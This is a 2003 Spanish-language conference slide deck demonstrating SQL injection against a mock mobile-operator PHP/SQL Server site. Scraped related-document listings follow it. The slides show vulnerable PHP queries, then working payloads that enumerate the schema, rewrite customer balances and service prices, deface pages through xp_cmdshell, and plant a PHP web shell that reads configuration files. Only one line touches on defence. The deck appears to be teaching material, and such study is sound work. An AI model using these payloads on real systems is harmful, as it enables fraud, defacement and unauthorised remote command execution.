Exploiting Web applications SQL Injection

SQL Injection

FIST Conference October 2003 @

2© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com

SQL Injection

Escenario:

Windows 2000 Professional

Apache Win32 1.3.28

PHP 4.3.3

SQL Server 2000

Documentos HTML y scripts PHP

SQL Injection

Operadora de móviles, servicios online:

consulta de saldo

contratación de teleservicios

A través de un identificador secreto asignado a cada cliente, que se utiliza para consultar información y como medio de pago.

SQL Injection

Estructura tabla “clientes”:

SQL Injection

Estructura tabla “servicios”:

SQL Injection

Página principal:

SQL Injection

Consulta de saldo legítima:

SQL Injection

Contratación de un servicio:

SQL Injection

consultasaldo.php:

$query = "SELECT nombre, apellidos, saldo FROM clientes WHERE id='$idcliente';"; $result = mssql_query ($query); $nfilas = mssql_num_rows ($result); while ($row = mssql_fetch_array ($result) ) {

echo "Nombre del cliente: " . $row[0] . " " . $row[1] . " "; echo "Saldo actual: " . $row[2] . "";

SQL Injection

contratar.php:

$query = "SELECT * FROM servicios WHERE id='$idservicio';"; $result = mssql_query ($query); $row = mssql_fetch_array ($result);$precio = $row [3]; echo "El precio del servicio que desea contratar es de $precio euros "; $saldo_final = $saldo_actual - $precio; $query = "UPDATE clientes SET saldo=$saldo_final WHERE id='$idcliente';"; mssql_query ($query); $query = "UPDATE clientes SET servicio" . $idservicio. "=1 WHERE id='$idcliente';"; mssql_query ($query);

SQL Injection

Mapear la base de datos:

tablas que componen la base de datos

listado y tipo de las columnas de cada tabla

SQL Injection

5' AND 1=0 union select TABLE_NAME from

INFORMATION_SCHEMA.TABLES—

Warning: mssql_query(): message: Todas las consultas de una instruccion SQL que contenga un operador UNION deben tener el mismo numero de expresiones en sus listas de destino. (severity 16) in c:\apache\htdocs\consultasaldo.php on line 21

5‘ AND 1=0 union select TABLE_NAME," ",1 from

INFORMATION_SCHEMA.TABLES--

SQL Injection

5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,1 from INFORMATION_SCHEMA.COLUMNS

SQL Injection

5‘ AND 1=0 union select TABLE_NAME, COLUMN_NAME,type from syscolumns, INFORMATION_SCHEMA.COLUMNS—

SQL Injection

5‘ AND 1=0; update clientes set saldo=500000 where id=5555--

SQL Injection

5556'; update servicios set precio=1 where nombre_servicio="llamada en espera"—

SQL Injection

Warning: mssql_query(): message: Linea 1: sintaxis incorrecta cerca de '—'. (severity 15) in c:\apache\htdocs\contratar.php on line 22

Warning: mssql_query(): message: Comilla no cerrada antes de la cadena de caracteres ';'. (severity 15) in c:\apache\htdocs\contratar.php on line 22

SQL Injection

5‘ AND 1=0; exec master..xp_cmdshell 'echo "<html> <body><img src=http://www.geocities.com/clan_de_vampiros/Caminante.gif> hackedwebpage!</body></html>" > c:\apache\htdocs\deface.htm'—

5556’; exec master..xp_cmdshell ‘copy c:\apache\htdocs\deface.htm

c:\apache\htdocs\principal.htm’—

SQL Injection

shell.php:

O también: passthru ()

SQL Injection

5556'; exec master..xp_cmdshell 'echo "<html><body><?php $comando=$_GET["comando"];echo $comando;$resultado = system ($comando);echo $resultado;?></body></html>" > c:\apache\htdocs\shell.php'--

http://127.0.0.1/shell.php?comando=dir..

SQL Injection

http://127.0.0.1/shell.php?comando=type c:\odbc.conf

SQL Injection

En php.ini:

; Magic quotes for incoming ; GET/POST/Cookie data.magic_quotes_gpc = On / Off

Sin embargo, con campos numéricos esta protección es inútil

Madrid, 25 October 2003

FIST Conference October 2003

SQL Injection

Exploiting Web applications SQL Injection

Technology

SQL Injection

SQL Injection от А до Я - ptsecurity.com · SQL Injection –Базовые знания Эксплуатацию SQL Injection разделяют в зависимости

Advanced sql injection in sql server

SQL Injection

SQL Injection & Soul Injection attacks

Advanced SQL Injection

PowerPoint Presentationmrkto.b2bmarketing.net/rs/085-VAB-435/images/Advancement 1035 … · hacking. pentesting. injection, injection. sql injection. sql injection, heavy connection

iBibliography SQL Injection Solutions › 412 › term_project › reports... · using Acunetix showed 199 SQL injection and 42 blind SQL injection vulnerabilities. From Acunetix

SQL Injection 3

WHAT IS SQL INJECTION? ANATOMY OF A SQL INJECTION

1 SQL INJECTION & COUNTERMEASURES. Outline Introduce SQL Injection SQL Injection Attack Types Prevention of SQL Injection Attack (Countermeasures) 2

SQL Injection Finalv1 - Virtual Security Operations Center · 2014-08-25 · POPULAR TYPES OF SQL INJECTION ATTACKS ... SQL Injection Attack: SQL Operator Detected SQL Injection Bypass/Probing

CSE 127: Computer Security SQL Injection · the database. SQL Injection ... Databases parses user input as code. SQL Injection SQL Injection: Inserting SQL fragment into query sent

Exploiting Webapps using Oracle Databases Alexander ... · 10 years of SQL Injection ... Detailed explanations for SQL Injection in web apps with Oracle ... SQL Basics – Combining

SQL Injection Homograph Attack Cross-Site Scripting · SQL Injection Homograph Attack Cross-Site Scripting Applicazioni di Rete – M. Ribaudo - DISI SQL Injection “SQL Injection

SQL Injection Crash Course for · PDF fileSQL Injection in PL/SQL ... Pentests, Training Alexander Kornbrust ... There are 3 main common techniques of exploiting SQL

Ethical Hacking Module XIV SQL Injection. EC-Council Module Objective What is SQL Injection? Exploiting the weakness of Server Side Scripting Using SQL

CORSO DI SICUREZZA DELLE RETI E DEI SISTEMI SOFTWARE · 3| 32 Outline SQL Injection examples Blind SQL Injection examples Introduction to manual SQL Injection SQLMap Fuzzing SQL Injection

SQL INJECTION CPSC 4670. Topics 1. What are injection attacks? 2. How SQL Injection Works 3. Exploiting SQL Injection Bugs 4. Mitigating SQL Injection

Sql injection ( )